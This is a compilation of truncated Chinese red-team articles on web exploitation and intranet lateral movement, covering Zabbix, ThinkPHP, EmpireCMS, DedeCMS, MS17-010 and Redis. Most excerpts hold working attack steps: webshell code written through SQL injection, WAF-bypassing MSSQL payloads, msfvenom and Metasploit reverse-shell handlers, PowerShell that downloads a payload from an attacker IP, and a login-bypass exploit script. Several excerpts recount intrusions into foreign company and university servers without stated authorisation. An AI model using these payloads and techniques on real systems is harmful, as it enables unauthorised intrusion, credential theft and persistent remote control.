红队攻击面相关讨论

0x01 说明本次用到的平台是：https://chaos.projectdiscovery.io/,该平台收集国外各大漏洞赏金平台，目前拥有资产规模大概在1600 0000~1800 0000，很可怕的数量 ，并且每小时都在增加或减少，对接非常多的第三方自建赏金平台，这比我们自己去收集某个平台会来的多，挖到的概率也更大。 0x02 自动化方案流程使用脚本去获取projectdiscovery平台的所有资产，资产侦察与收集就交给projectdiscovery了把下载的资产对比上次Master domain数据，判断当前是否有新增资产出现，如果没有就结束 ，就等待下一次循环如果有，就把新增的资产提取出来，创建临时文件，并把新资产加入到Masterdomain把新增资产使用naabu 进行端口扫描，把开放的端口使用httpx来验证，提取http存活资产把http存活资产送往nuclei进行漏洞扫描，同时也送往Xray，默认使用Xray的基础爬虫功能扫描常见漏洞Xray的扫描结果保存成xray-new-$(date +%F-%T).html，也可以同时添加webhook模式推送nuclei漏洞扫描结果用notify实时推送、 nuclei与xray都扫描结束后 ，等待下一次循环，这一切都是自动去执行 0x03 准备工作先安装这些工具，并设置好软链接，能全局使用，这些工具安装很简单，不再阐述，github也有 安装教程 Centos7+ 64 位 配置 4H 4G起 【服务器一台】chaospy【资产侦查、资产下载】 https://g…

1. 概述1.1 案例先来看两张图： 看到这两张图的第一印象应该是这是一个成功的登陆，其类型为3，代表网络登陆，4624表示成功登陆，可能大部分人都是如此认为。 那么实际上呢？这里面是存在一定歧义的，今天给大家同步一下这里面的详细细节。 1.2 原理当用户使用SMB 协议连接时，在提示用户输入密码之前，其会使用anonymous用户（也就是匿名用户）进行 SMB 网络连接，一旦网络将被记录为成功连接。其有以下几个条件会导致产生这条日志： 登陆用户为anonymous 登录进程为NTLMssp 使用协议为NTLM V1 登陆协议为SMB 2. 测试2.1 SMB连接失败情况2.1.1 找不到网络名/拒绝访问直接使用net use发起一个针对不存在的aaa$的连接，会报错找不到网络名，使用net use也可以看到其连接并没有成功： 但是我们来看看日志，可以看到其产生了一条4624类型3的成功登陆的日志，这个仅仅表示使用anonymouse用户成功登录网络 使用正确的目录路径，但不输入用户会报错拒绝访问，该状态同样会导致一个匿名用户的登录成功 类型3 2.1.2 用户名或密码不正确使用不正确的账密登录时，会报错用户名或密码不正确。 这种情况在日志中就不会出现匿名登录登录成功日志，而是直接显示4625日志，当然也显示了登录的用户名。 2.2 SMB登录成功如果使用正确的账密进行登录的话在日志中的表现是如何呢？ 除类型3的登录成功以外，还会有4776（验证凭据）和4672（登录权限分配）的shijian 3. 总结当攻击者使…

关于Mysql蜜罐的具体技术细节，网上文章介绍的太多了，大家可以自己从网上搜索文章，我写一个简介吧：mysql中有一个load data local infile函数能够读取本地文件到mysql数据库中。当攻击者用爆破mysql密码的扫描器扫描到我们的mysql并连接上的时候（注，这里我纠正一下，只要连接一下蜜罐mysql，就可以被蜜罐读取到本地配置文件，不需要提供正确的用户名密码），客户端（攻击者）会自动发起一个查询，我们（服务端）会给与一个回应，我们在回应的数据包中加入load data local infile读取攻击者的本地文件到我们数据库中，达到反制的目的。（以下图片来源于网络搜索） cs的配置文件明文存储密码只要是使用cs客户端连接过cs服务端的电脑，cs客户端都会在固定的文件夹下生成一个.aggressor.prop配置文件。如果是Windows系统，那么文件位置是：C:\Users\Administrator\.aggressor.prop，这个配置文件里面就包含了cs远控的ip地址、端口、用户名及密码，而且都是明文的！如下图所示： 每次打开cs都会显示出曾经登录后的ip地址、端口、用户名、密码等信息，这些信息都是存储在本地.aggressor.prop文件中的，大致内容如下图所示： 因此我们得到结论，搭建一个mysql蜜罐，一旦攻击者连接这个蜜罐，那么这个蜜罐利用msyql本地文件读取漏洞去自动读取C:\Users\Administrator\.aggressor.prop这个文件内容，蜜罐就可以成功得到攻…

一、安装 fiddler 官网下载：https://www.telerik.com/download/fiddler 二、配置 打开fiddler tools-> options，genneral: 全选 https: connections: 配置代理地址 gateway: 三、打开电脑端小程序 退出微信，登录微信时设置代理 打开小程序 抓包成功 如果没成功 打开小程序、打开任务管理器，找到小程序进程，打开文件所在位置 退出微信，删除\WMPFRuntime 下所有文件，再次登录打开小程序就可以了 C:\Users\backlion\AppData\Roaming\Tencent\WeChat\XPlugin\Plugins\WMPFRuntime 。

0x00 前言最近在复现zabbix的漏洞（CVE-2022-23131），偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA（Zabbix Sia）公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞，该漏洞源于在启用 SAML SSO 身份验证（非默认）的情况下，恶意行为者可以修改会话数据，因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 0x01 漏洞原因 在启用 SAML SSO 身份验证（非默认）的情况下，恶意攻击者可以修改会话数据来实现身份认证绕过。未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 该漏洞存在于index_sso.php文件中，由于index_sso.php文件未调用CEncryptedCookieSession::checkSign()方法对cookie进行校验，且客户端的cookie可被伪造。 从index_sso.php文件中可以看出，当伪造的cookie中存在saml_data时，获取username_attribute的数据，如果该用户真实存在则会生成一个sessionid从而实现身份认证绕过 0x02 漏洞影响 5.4.8 5.0.18 4.0.36 0x03 漏洞复现fofa：app="ZABBIX-监控系统" && …

0x00 前言之前在打一个域环境的时候出现了域内主机不出网的情况，当时用的是cs的socks代理将不出网主机的流量代理到了边缘主机上。当时没有考虑太多，下来之后想到搭一个环境复现一下当时的情况，看有没有更简便的方法能够打下不出网的主机。 机缘巧合之下，发现了这个域环境还不错，再复现的过程中也有一些知识触及了我的知识盲区，也收获了许多新的知识。特地把过程记录下来，与想要学习打域内不出网主机的师傅们共同分享。 0x01 靶场地址分配内网网段：192.168.52.0/24 外网网段：192.168.10.0/24 攻击机： kali：192.168.10.11 靶场： win7(内)：192.168.52.143 win7(外)：192.168.10.15 域内主机： Winserver2003：192.168.52.141 Winserver2008：192.168.52.138 其中win7可以外网、内网通信，域内主机只能内网之间进行通信 一开始DCping不通win7，win7关闭防火墙之后可以ping通 打开C盘下的phpstudy目录打开web服务 0x02 web服务器渗透nmap探测端口 开了80端口，尝试访问web地址，发现为php探针 滑到最底部，发现网站底部有一个MySQL数据库连接检测 弱口令root/root连接成功 扫描后台我这里用的是御剑，但是好像很拉，因为在我打完这个靶场之后再去网上看的时候发现他们很多扫出来一个cms，通过cms也能拿shell，这里我就不演示怎么用cms弱口令进后台写shell…

1. 根据网卡获取的网段信息，对win7所在网段来一波存活主机检测，排除其他的之后目标锁定在主机号为128的主机上2. 对发现的存活主机来一波整体信息收集发现开了以下的端口，并且是一个域用户┌──(root💀kali)-[/]└─# nmap -A 192.168.164.128 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CSTNmap scan report for 192.168.164.128Host is up (0.00052s latency).Not shown: 989 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45|_http-title: Site doesn't have a title (text/html).135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Wi…

0x01 前言Date/time：2015年，这次渗透测试中发现已经拿下的几台机器的管理员密码存在一定规律性，最终通过分析密码规律、组合新密码成功拿下目标整个C段机器权限，个人感觉这是个不错的内网通用/规律密码实战案例，所以想着还是记录一下吧。 0x02 Getshell过程网站基本信息探测： 目标站点：http://www.that****elos.com.br 服务器IP：189.**.**.204（巴西） 环境平台：ASP.NET 服务器系统：Windows这个网站禁止国内IP访问，所以只能上墙去做测试了，先用Chrome浏览器插件和指纹识别网站都未能得到服务器系统具体版本，不过根据个人经验猜测这应该是台Windows2003。 Chrome浏览器插件：Server Details 1.0.12、Wappalyzer 服务器系统识别：http://fuwuqixitongshibie.51240.com/?q= 网站后台地址：http://www.that****elos.com.br/admin/接着我们用Safe3WVS_v10.1漏洞扫描工具成功找到几处注入，并使用sqlmap工具验证这个注入点确实是存在的，并且已经跑出管理员的表和列，只不过在跑管理员用户密码时报错了。 跑表名： sqlmap -u "http://www.that****elos.com.br/detalhe_produto.asp?codProd=510" --tables [7 tables]：categorias，clientes，destaque…

0x00 实验目的拿到域环境下其他主机的网站源码 0x01 渗透思路通过拿到网站shell渗透到内网，由内网存活主机拿到域控权限，再由域控渗透到其他域里面得主机获取资源。 0x02 实验过程访问目标网站IP发现是一个静态网站，发现网站前台无法利用，尝试爆破一下网站后台 利用御剑扫描后台没有发现后台登录界面，但发现了robots.txt文件，查看robots.txt发现里面有网站后台目录 访问网站后台页面 尝试使用burp暴力破解，发现成功爆破出网站后台管理员账号密码为admin/passw0rd 利用爆破出来的管理员账号密码成功登录到网站后台（PS：登录的时候选择全功能登录） 发现在界面风格>模板选择处可以修改模板文件夹名，我们将模板文件夹名修改成1.asp，尝试利用IIS解析漏洞 然后在界面风格>编辑模板/css文件>添加模板处将aspx一句话木马添加成html文件 利用菜刀成功连接到我们写入的一句话木马 利用一句话木马上传一个aspx的大马上去，方便操作 查看发现该主机是双网卡，得到两个内网IP段 查看该主机缓存信息发现几个内网IP 查看发现192.168.152.173开启了1433端口，我们推测其可能是一台数据服务器 查看网站配置文件发现数据库账号密码 利用aspx大马成功登录到数据库，并且发现是system权限 查看域里所有用户名 查询域组名称 查看当前域中的计算机列表 查询域管理员 利用数据库shell添加一个账号，并将其加入到…

0x01 前言朋友发来一个站让帮看下提权，服务器上安装的有护卫神+火绒+安全狗等安全防护软件，看着确实挺唬人，他也试了不少常用提权EXP，结果都失败了，可能是欠缺免杀EXP能力吧，当然也有可能是修复了这些漏洞，抽空给他看了下并写了这篇记录文章。 在拿到权限后用中国菜刀连了下，不过好像被拦截了，提示：服务器返回无效或不可识别的响应，以前也多次遇到这种情况，这里只要换成Godzilla就能正常连接了。 0x02 服务器基本信息搜集虽然朋友在测试后给提供了些信息，但还是习惯自己去看下，因为每个人掌握的知识点和实战经验不一样，只有自己看了后才知道安装了哪些环境、WAF/AV和第三方软件，以及开放了哪些端口、打了多少补丁等，这样才能更好对其系统薄弱点进行测试。目标系统：Windows 2008 R2 (6.1 Build 7601, Service Pack 1).当前权限：iis apppool\*****.com支持脚本：ASP、ASPX、PHP，能够直接执行系统命令开放端口：21(ftp)、80(http)、135(rpc)、443(https)、445（smb）、801(http)、3306(mysql)、2121(G6FTP)、8021(G6FTP)、6588(hws)、58895(TermService)进程名称：G6FTPServer.exe、G6FTPTray.exe、HwsHostPanel.exe、mysqld.exe、php-cgi.exe、SafeDogUpdateCenter.exe、CloudHelper.exe、Sa…

0x01 渗透测试过程通过渗透网站拿到webshell，然后通过webshell拿到网站主机系统权限，发现受害主机有两张网卡，另一张网卡下有两台存活的内网主机，然后我们就尝试渗透存活的内网主机看能不能拿到系统权限，最后发现两台内网主机都开启了445端口，然后搜索了一下445端口漏洞发现有个最新的m17_010可能可以利用，结果真的通过ms17_010成功获得了内网主机的权限。 目标网站ip：192.168.31.196 浏览网站通过手工测试发现http://url/hr/hr.php?hrid=15处有注入点 尝试利用sqlmap工具跑一下这个注入点，看能不能注出有用的信息 通过测试发现这个注入点果然可以进行注入 然后利用该注入点进行尝试注出网站后台登录账号密码 发现跑出来的网站后台密码是用md5加密的，所以利用md5解密一下，发现只有两个权限较低的密码可以解密，而权限较高的admin账号解不开。不过问题不大，先用登录后台（后台登录界面可以用御剑跑出来）看一下 利用御剑跑出的后台目录里有个phpinfo页面，说不定可以得到一些有用的信息 发现可以得到网站文件的绝对路径 发现网站后台数据维护处可以执行sql语句，通过phpinfo页面知道了网站绝对路径，可以尝试在此处写入php一句话木马 select "<?php eval($_POST[123456]);?>" into outfile "/UPUPW_AP5.2/vhosts/jy.test.com/321.php" 发现可以执行成功 …

内网漫游拓扑图 利用登录绕过漏洞进行后台 目标网站ip：192.168.31.55，将目标网站ip绑定到本地hosts文件下的www.test.com下（防止直接访问ip网站加载不全），访问www.test.com得到网站首页，发现是一个html静态网站 经过点击发现该网站是FoosunCMS搭建的经过点击发现该网站是FoosunCMS搭建的 版本为v2.0，存在可以利用的漏洞，绕过管理员账号信息验证，直接进入后台，可谓是非常危险的一个利用漏洞，访问网站后台地址：/manage/Index.aspx 搜索发现FoosunCMS v2.0有一个登录绕过漏洞，尝试登录绕过，访问下面链接得到UserNumber http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin发现得将UserNumber加密后拼接成cookie即可成功登录 直接用sql注入拿到UserNumber，然后再与UserName等拼接，构造cookie直接以管理员权限登录，Exp代码如下： #coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher import AESfrom binascii import b2a_hex…

0x00 简介 0x01 获得shellGetshell的过程没什么好说的，无非简单的后台弱口令到上传然后冰蝎连接getshell。 获得shell后，模拟终端ping 8.8.8.8有返回包，说明该服务器与外网互通。 既然跟外网互通，那么可以尝试直接使用msf的exploit/multi/handler配合冰蝎反弹shell来获得session use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost xxx.xxx.xxx.xxx set lport 5665 run 但是结果很不尽人意，没能够成功获得session。 在使用冰蝎模拟终端收集信息过程中，发现本地有powershell进程。 再次打开msf，本次尝试使用web_delivery配合终端执行powershell指令来获得session。 User exploit/multi/script/web_delivery Set targets 2 set payload windows/x64/meterpreter/reverse_https set lhost xxx.xxx.xxx.xxx set lport 4332 set srvport run 获得payload，使用冰蝎或者C刀模拟终端直接执行，成功获得session，执行getuid发现权限为system权限，省去了提权过程。 0x02 权限维持 我们使用ps查看当前进程，然后选中一个看起…

0x00 概述目标站点是http://www.example.com，官网提供了api使用文档，但是对其测试后没有发现漏洞，目录、端口扫描等都未发现可利用的点。后发现官网提供了客户端下载，遂对其进行一番测试。 0x01 信息收集先抓了下客户端的包，使用Fiddler和BurpSuite都抓不到，怀疑走的不是HTTP协议，用WireShark查看其确实用的是HTTP协议，但是数据包不好重放，这里最后使用了WSExplorer抓指定进程的包，成功抓取到通信的数据，抓到的数据如下，绿色的是请求包，红色的是响应包。 数据包又分为两部分，一个是请求行和请求头。 一个是请求正文。 拼接起来即可放到BurpSuite中进行数据包的重放 0x03 测试过程可看到请求包经过了加密再传输，返回的响应包也经过了加密。但是加解密总归是在客户端进行的，所以可从分析客户端入手。 使用Exeinfo PE查壳，可得知使用的是.NET框架 C#开发的程序。 可以使用dnspy，针对.NET程序的逆向工程工具，对客户端的加解密进行分析。打开后发现类及方法的命名都是无规律的数字字母，代码做了混淆。 混淆了的代码不利用阅读分析，可使用De4Dot尝试反混淆，支持很多种混淆加密工具混淆过的源码。 de4dot-x64.exe origin.exe 即可得到反混淆后的程序 origin-cleaned.exe 将反混淆后的程序拖入dnspy查看，可看到基本已还原，提高了可读性。 因为其通信采用的是HTTP协议，又发现有个类名为HttpHelper，跟进分析，代码…

0x01 简介本次测试为实战测试，测试环境是授权项目中的一部分，敏感信息内容已做打码处理，仅供讨论学习。请大家测试的时候，务必取得授权。 拿到授权项目的时候，客户只给我了一个公司名字，这里以某某公司代替。 0x02 信息搜集老办法，先是子域名扫描，然后目录扫描，发现了个鸡毛，啥利用点也没有，而且是云主机。进一步探测资产，欧力给，发现了CVE-2019-0708。targetr是windows server 2008 r2系统。 0x03 Getshell心想，发现了CVE-2019-0708，这样shell总稳了吧。这时迟那时快，拿出我的大保健msf，梭哈一波。卧槽，居然发现不能利用，探测到有漏洞，但是创建session失败。 不甘心，set target也没用，攻击了20多次，还是一样的错误，害苦了客户的靶机，跟着蓝屏20多次。 继续看，发现有redis资产，尝试弱口令看看，居然密码是123123，先查看一下信息： 这里利用有个难点，就是我们根本不知道网站的实际物理路径，尝试报错或者物理路径爆破，无果~~~，所以无法通过写一句话等形式拿下Webshell；这里也没有像linux一样的反弹利用；也没有计划任务可写。 经过前期的信息收集发现是windows server 2008 r2，我们可以写一个启动木马的脚本放到启动里面，然后利用CVE-2019-0708“强迫”主机重启。 说干就干，这里用powershell的cs马（请注意免杀，这里不讨论）。先设置redis的工作目录为windows的启动目录，然后写cs的马，最好记得务必s…

0x01 环境准备kali（模拟公网攻击机） Windows2008（靶机，装有360、火绒、安全狗、D盾） Powersploit（PowerShell攻击框架） https://github.com/PowerShellMafia/PowerSploit 0x02 尝试落地payload首先msfvenom生成exe后门程序 msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=192.168.192.119 lport=6666 -o ./6666.exePython3开启http下载服务 python3 -m http.servermsf开启监听 执行powershell命令时被火绒拦截 (New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/6666.exe") 0x03 PowerShell内存执行exe这也是现在红军非常流行的攻击手法，payload在内存中加载执行，也就是所谓的文件不落地，大致分以下几步 先将生成的payload在本地进行base64编码靶机执行远程下载命令靶机对payload进行解码并赋值给一个变量PowerShell远程加载Invoke-ReflectivePEInjection模块（PE反射注入）并执行payload本地编码payloadPowerShell下执行 function Convert-BinaryToString { …

0x00 前言在内网渗透的过程中思路才是最重要的，本次内网渗透的主机虽然不多，主要还是锻炼自己内网渗透的一个思想。 0x01 环境搭建靶场： win7(内)：192.168.138.136 win7(外)：192.168.10.25 域内主机： win2008：192.168.138.138 0x03 web服务器渗透nmap探测端口nmap -T4 -sC -sV 192.168.10.25 这里可以看到几个主要的端口，例如80、135、139、445，这里首先就可以想到可以利用的点有ipc、smb 开了80端口，尝试访问web地址，老笑脸人了，而且还是5.x版本，洞还是比较多 为了确定具体版本，这里先使用报错查看，发现这里的版本为5.0.22，如果没记错的话这里是有一个tp远程命令执行漏洞的 thinkphp getshell这里我首先在kali里面找一下有没有相关的漏洞 searchsploit thinkphp 可以看到这里有一个5.x远程执行漏洞，这里直接进入这个文件夹查看一下txt列出来的payload cd /usr/share/exploitdb/exploits/php/webapps cat 46150.txt 找到对应版本后fuzz以下payload，这个是列出数据库名字，这里看到数据库名为root 192.168.10.25/thinkphp/public/?s=.|think\config/get&name=database.username 这个payload应该是列出数据库密码，但是这里…

0x00 前言文章所述漏洞已经提交至漏洞平台，且所有恶意操作均已复原 0x01 源码泄露http://www.xxx.com.cn/www.zip老规矩拿到源码先通关关键词找敏感信息 key pwd passwd password找到了半天居然找不到一个有效的密码 最后在robots.txt中看到CMS的信息-EmpireCMS 查询知道是开源cms后，直接百度查询数据表结构 知道了管理员记录表为phome_enewsuser,在源码里全局搜索 0x02 敏感信息泄露 点击进去得到管理员用户名，密码hash和盐值 直接解md5得到口令 Kite/kite得到口令后就是找到后台地址，由于是开源的百度一下就有了 看一眼目录并没有修改后台地址，所以直接访问 http://www.xxx.com.cn/e/admin/ 得到具体的版本号为6.6 0x04 历史漏洞登录到后台后，因为是开源CMS，历史漏洞才是渗透的关键 直接搜索empireCMS漏洞，开始复现历史漏洞 1.后台-模版-公共模版-js调用登陆模版getshell还没有开始就已经结束 Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist好家伙，这是把表都删了吗 2.后台数据表与系统模型-导入数据库模型getshellEmpireCMS 7.5以及之前版本中的e/class/moddofun.php文件的LoadInMod函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 在本地先新建一个test.php.mod文件…

0x00 前言此次渗透中的所有修改已经复原，且漏洞已经提交至cnvd平台 0x01 源码泄露在一个月黑风高的夜晚，闲来无事的我又开着脚本利用hunter进行互联网站点源码的扫描 在查看备份文件扫描结果时，看到了宝贝 二话不说，访问下载得到源码！ 可以在注释信息处发现dedecms的痕迹 0x02 敏感信息泄露获得源码的第一步当然是获取敏感信息 先尝试全局搜索（crtl+shift+f）关键词 key pwd passwd password1.数据库信息泄露 2.后台管理员密码泄露 md5解密尝试解密，居然是一个弱口令 有了账户密码后当然是要找到后台管理地址，那么有了源码后台管理地址还不是手到擒来？ 后台RCE->getshell源码中找到后台地址（居然改了个888） 用泄露的admin/admin888进入后台后，发现版本信息为dedecms PS1 0x03 历史漏洞既然已经获得了cms信息，第一步当然看看他的历史漏洞 查找SP1历史漏洞都是远程代码包含漏洞，但是这个站点已经将关键文件install.php删除（源码中不存在） 抱着侥幸心里又去尝试访问l一下（说不定后来又加上了呢）确实不存在，只能继续查看其他功能点 然后也尝试测试了许多SP2的漏洞payload但均失败 继续测试其他点继续查看发现系统设置->系统基本参数->其他选项中有模板引擎的禁用函数 但是明明没有模板引擎功能他为什么要禁用呢？ 我带着这个疑问又重新翻看源码 果然又找到模板相关文件，（说明只是功能点被隐藏，文件依旧还在） 尝试访问，成…

故事的起因比较简单，用三个字来概括吧：闲得慌。 因为主要还是想练习练习内网，所以用了最简单粗暴的方法去找寻找目标，利用fofa来批量了一波weblogic，不出一会便找到了目标。 简单的看了下机器环境，出网，没有杀软（后面发现实际是有一个很小众的防火墙的，但是不拦powershell），有内网环境。 所以这里直接尝试cs自带的Scripted Web Delivery模块，直接创建一个web服务用于一键下载和执行powershell。 运行刚刚生成的powershell 这边的CS成功上线。 这里我们先来看看系统的信息。 根据上面的可知服务器是2012的，内网IP段在192.168.200.x 接着用Ladon扫了下内网环境。 这个内网段机器不多，可以看出有域环境。接着进行了多网卡检测，web检测。 可以看出这个内网有多个网段，开了一个web服务。 mimikatz只读到了一个用户跟加密的密码 密码可以在CMD5上解开 接下来就到最激动人心的扫描MS17010时刻！！！ 可以看出有几台机器是可能存在MS17010的，所以打算开个socks代理直接MSF去打。 这里笔者劝大家买服务器的时候，尽量买按量计费的服务器，不要像笔者一样，贪图一时便宜，买了个带宽只有1M的HK服务器，CS自带的socks代理开了，本地测试连接都失败，更别说其他操作了。 所以这里，笔者只能临时开了个按量计费的服务器，利用EW重新开了一条隧道出来。具体流程如下： 把ew文件丢上刚刚开的服务器，执行：ew -s r…

0x01 前言目标是一大学，在一次挖洞过程中遇到个sql注入，尝试进一步利用扩大危害，漏洞已报送平台进行了修复 0x02 sql注入getshell失败在id处连续加两个单引号都报错，经过探测发现是数字型的注入且过滤了空格，这里可以用/**/代替 于是直接上sqlmap python sqlmap.py -u url --batch --tamper=space2comment.py –dbs 发现是dba权限： python sqlmap.py -u url --batch --tamper=space2comment.py --is-dba 试了很多方法找web路径 最后注意到操作系统是FreeBSD 无意中看到这个 char(47)就是’/’，立马想到可以通过这个遍历目录、找路径 通过从根目录开始逐层遍历，最终找到网站根目录： 写入shell失败，转换成16进制规避单引号还是不行 但是这个注入可以读取服务器上的任意敏感文件（包括非web目录），危害巨大 0x03 从其它点继续尝试读取sql注入处代码，发现并没有代码层面的过滤，explode() 函数把字符串打散为数组，这里以空格为分隔，取数组的第一个，变相地过滤了空格，把空格换成内联注释就能注入 根据泄露的数据库账号、密码尝试连接3306端口失败，估计绑定了本地ip 继续遍历目录，发现了mysql的登陆界面 登录之后却是空白界面，读取处理登录逻辑的代码发现登陆成功直接设置session但不跳转，登陆后直接访问首页就行 查一下secure_file_priv，发现是…

前言本文为一篇利用非常规手段突破安全策略的内网渗透记录 环境简述&说明web打点getshell，webshell是冰蝎，权限为.net，权限很低，服务器为server 2016，目标不出网！装有杀毒软件（火绒、微软自带的WD），ASMI默认开启，而且对power shell有特殊策略限制。Tcp、icmp、DNS协议不通，无法直接与公网的cs服务端建立连接，（内网的cs服务端也无法与其建立连接）公网也无法访问目标web服务（纯内网web服务）极其严格的出入站策略入站规则：只有http允许入站，只有一个80、8080两http端口能供内网机器正常访问 出站规则：不允许非8080端口对外通讯。 手绘了一张拓扑图，将就着看一下。 为什么要上线cs webshell权限太低，限制性大，需要上线cs提权，因为cs是采用反射dll来加载pe程序，从而在执行一些敏感操作的时候能起到一定的bypass作用，例如mimikatz抓密码等操作。 像转储LSA到本地然后再dumphash都是行不通的，因为webshell权限太低了，转储LSA至少得管理员权限。 而且目标网络环境较为苛刻，任何非http协议的通讯都会被防火墙拦截，无法正常建立一个具有交互功能的shell。 坑点一：利用Pystinger反向代理上线cs在查阅相关资料后，发现网上大部分文章都通过Pystinger来实现内网反向代理，利用http协议将目标机器端口映射至cs服务端监听端口，能在只能访问web服务且不出网的情况下可以使其上线cs。 但是这里有个问题，公网cs服务器无法访问目…

0x00 初探内网在向信息中心的老师申请了对学校进行一次内网渗透测试的授权之后，我开始着手对学校内网中在用系统进行了一波信息搜集。其中大部分都使用了新版的未爆出0day的框架组件，这让我一开始的打点过程陷入僵局。但是在我重新翻了一遍学校开放的各种web系统后，我发现了一些令人惊喜的系统。 学校使用了很多新系统，但是并没有把老系统关闭，经过一番搜索确定了这个老系统存在任意文件上传漏洞。 没有任何过滤，可以说就是捡漏了。 而且也返回了一句话木马的路径。但是我遇到了一个很奇怪的现象，用蚁剑和用菜刀连接后，返回的路径不一样，其中的文件也不一样。 其中蚁剑连接的shell无法上传文件，而菜刀连接的却可以，并且webshell执行一次命令后就会封禁IP，怀疑有waf。所以我先传了一个msf的aspx木马来获取一个meterpreter的会话。使用windows-exploit-suggest探测未打的补丁。 发现存在MS16-075这个非常好用的漏洞，直接配合msf的juicy_potato模块来攻击，记住要修改CLSID，可以在这里找 https://github.com/ohpe/juicy-potato/tree/master/CLSID 使用的payload最好要选择正向连接 bind_tcp，不然有可能弹不回来shell。 这样就获取了system权限。接下来就是对机器进行信息搜集，获取对我们横向渗透有帮助的信息。很奇怪的一点是，这台机器本来是有域的，但现在却没有了，且无法找到域控。所以我们的重点放在密码撞库。使用msf自带的m…

本次测试为授权测试。注入点在后台登陆的用户名处 存在验证码，可通过删除Cookie和验证码字段绕过验证 添加一个单引号，报错 and '1'='1 连接重置——被WAF拦截 改变大小写并将空格替换为MSSQL空白符[0x00-0x20] %1eaNd%1e'1'='1 查询数据库版本，MSSQL 2012 x64 %1eoR%1e1=@@version%1e-- 查询当前用户 %1eoR%1e1=user%1e-- 查询当前用户是否为dba和db_owner ;if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e -- ;if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e -- 均出现延时，当前用户既不是dba也不是db_owner 尝试执行xp_cmdsehll，没有相关权限 ;eXeC%1esp_configure%1e'show advanced options',1;RECONFIGURE%1e -- ;eXeC%1esp_configure%1e'xp_cmdshell',1;RECONFIGURE%1e -- 查询当前数据库，连接重置——被WAF拦截 %1eoR%1e1=(db_name()%1e)%1e-- 去掉函数名的一个字符则正常返回——WAF过滤了函数db_name()。MSSQL和MSQL有一些相同的特…

0x01 前言随机找的个台湾某越科技集团下的站点作为此次测试目标，只是为了学习下内网渗透和MSF的使用。13年9月份时拿到了一个子域的Webshell权限后就没再继续测试了，当时服务器没有安装Symantec赛门铁克，但第二次去测试时发现已安装了Symantec，并进行了一些安全加固。 0x02 网站和内网的基本信息搜集 基本信息探测： 目标站点：http://www.ttes*****.com服务器IP：59.***.**.74（台湾省 中华电信）环境平台：ASP.NET服务器系统：Microsoft-IIS/6.0（Wind 2003）网站子域搜集： ，表中的这些子域名是前期搜集到的信息，但没想到很顺利的就拿到了Webshell（Fckeditor），如果主站找不到什么漏洞时可以通过“旁站”或“子域”下手。 因为本文着重记录的是MSF工具的使用和难点解决，所以对于怎么拿到的Webshell就不做过多描述了，在拿到权限后搜集到的服务器信息如下。 端口开放：25、80、135、445、1025、1521、3389补丁情况：服务器系统打了460+补丁(64位)脚本探测：服务器支持Asp、Aspx拓展名磁盘权限：C、D盘都有可读可写权限（大多数）ipconfig /all命令可以看到这台主机名为：websrv4，IP：192.168.0.203，DNS：192.168.3.1 Windows IP Configuration Host Name . . . . . . . . . . . . : websrv4 Connection-…